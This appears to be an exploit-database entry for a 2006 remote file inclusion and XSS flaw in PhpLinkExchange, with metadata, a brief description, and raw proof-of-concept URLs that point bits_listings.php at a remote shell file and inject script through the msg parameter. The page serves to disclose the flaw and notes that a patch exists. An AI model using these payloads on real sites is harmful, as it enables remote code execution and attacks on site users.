header-logo
Suggest Exploit
vendor:
PhpLinkExchange
by:
s3rv3r_hack3r
7,5
CVSS
HIGH
Remote File Include & XSS
98, 79
CWE
Product Name: PhpLinkExchange
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Remote File Include & XSS Vulnerability in PhpLinkExchange

A vulnerability in PhpLinkExchange allows remote attackers to include arbitrary files from remote locations and execute arbitrary code. It is also possible to inject arbitrary web script or HTML via the msg parameter.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

vendor :www.idevspot.com

Demo : www.idevspot.com/demo/PhpStart/PhpLinkExchange

By : s3rv3r_hack3r

www: hackerz.ir & h4ckerz.com

remote file include :

http://www.domain.com/PhpLinkExchange/bits_listings.php?svr_rootPhpStart=[shell.txt?]

xss:

http://www.domain.com/PhpLinkExchange/user_add.php?msg=[xss]

# milw0rm.com [2006-09-11]